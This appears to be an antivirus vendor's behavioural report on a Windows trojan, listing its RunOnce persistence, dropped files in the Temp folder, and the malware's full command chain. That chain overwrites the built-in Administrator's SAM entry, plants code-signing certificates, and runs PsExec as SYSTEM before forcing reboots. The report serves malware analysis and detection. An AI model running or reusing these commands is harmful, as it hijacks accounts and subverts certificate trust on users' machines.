Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] '192450' = '"%WINDIR%\Temp\ncmd.exe" exec hide cmd /c"echo. & cls "" & echo 192450>>"<Full path to virus>" & del /a /f /q "%WINDIR%\Temp\ncmd.exe""'
Malicious functions:
Creates and executes the following:
- %WINDIR%\Temp\pse.exe -i -d -s "<Full path to virus>"
- %WINDIR%\PSEXESVC.EXE
- %WINDIR%\Temp\ncmd.exe exec hide cmd /c"echo. & cls "" & del /a /f /q "rst*" & set "K1=HKLM\SAM\SAM\Domains\Account\Users" & (if ~$currdate.yyMMdd$ lss 120116 call set "K1=%K1%\000001F4") & (if ~$currdate.yyMMdd$ geq 120116 еxit) & call reg query "%K1%+" || (call reg copy "%K1%" "%K1%+") & call reg restore "%K1%" "ncmd.k01" & set "K2=HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates" & set "K3=\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847" & set "K4=\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C" & call reg add "%K2%%K3%" & call reg restore "%K2%%K3%" "ncmd.k02" & call reg add "%K2%%K4%" & call reg restore "%K2%%K4%" "ncmd.k03" & ncmd killprocess "~~$sys.sfxname$" & ren "pse.exe" "~d%RANDOM%.tmp" & ncmd exec show ncmd exitwin reboot force & ren "ncmd.k*" "~d%RANDOM%.*tmp" & del /a /f /q "~d*.*tmp"" killprocess "cmd.exe" killprocess "regedit.exe" cmdwait 1031 exec hide rst exitwin reboot force exitwin reboot force exec show ncmd exitwin reboot force killprocess "~$sys.sfxname$" exec hide cmd /c"echo. & cls "" & ncmd killprocess "rst.exe" & del /a /f /q "rst*" & ncmd regsetval dword "HKCU\Software\Sysinternals\PsExec" "EulaAccepted" "1" & ncmd exec hide pse -i -d -s "~~$sys.sfxname$"" filldelete "cmd.*" shellcopy "~$nir.exefile$" "~$folder.nircmd$\rst.exe" noerrorui silent yestoall killprocess "rst.exe" regsetval sz "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" "~$currtime.HHmmss$" "~q~$nir.exefile$~q exec hide cmd /c~qecho. & cls ~q~q & echo ~$currtime.HHmmss$>>~q~$sys.sfxname$~q & del /a /f /q ~q~$nir.exefile$~q~q" exec hide pse -i -d -s "~$sys.sfxname$" regsetval dword "HKCU\Software\Sysinternals\PsExec" "EulaAccepted" "1"
- %WINDIR%\Temp\rst.exe cmdwait 3598 exitwin reboot force
Executes the following:
- <SYSTEM32>\reg.exe restore "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847" "ncmd.k02"
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847"
- <SYSTEM32>\reg.exe restore "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C" "ncmd.k03"
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C"
- <SYSTEM32>\reg.exe query "HKLM\SAM\SAM\Domains\Account\Users\000001F4+"
- <SYSTEM32>\logonui.exe /status /shutdown
- <SYSTEM32>\reg.exe restore "HKLM\SAM\SAM\Domains\Account\Users\000001F4" "ncmd.k01"
- <SYSTEM32>\reg.exe copy "HKLM\SAM\SAM\Domains\Account\Users\000001F4" "HKLM\SAM\SAM\Domains\Account\Users\000001F4+"
Attempts to shut down the Windows operating system.
Modifies file system :
Creates the following files:
- %WINDIR%\Temp\pse.exe
- %WINDIR%\Temp\rst.exe
- %WINDIR%\PSEXESVC.EXE
- %WINDIR%\Temp\ncmd.k03
- %WINDIR%\Temp\ncmd.exe
- %WINDIR%\Temp\ncmd.k01
- %WINDIR%\Temp\ncmd.k02
Deletes the following files:
- %WINDIR%\Temp\~d10573.k03tmp
- %WINDIR%\Temp\~d29590.tmp
- %WINDIR%\Temp\~d10573.k02tmp
- %WINDIR%\Temp\rst.exe
- %WINDIR%\Temp\~d10573.k01tmp
Miscellaneous:
Searches for the following windows:
- ClassName: 'StatusWindowClass' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''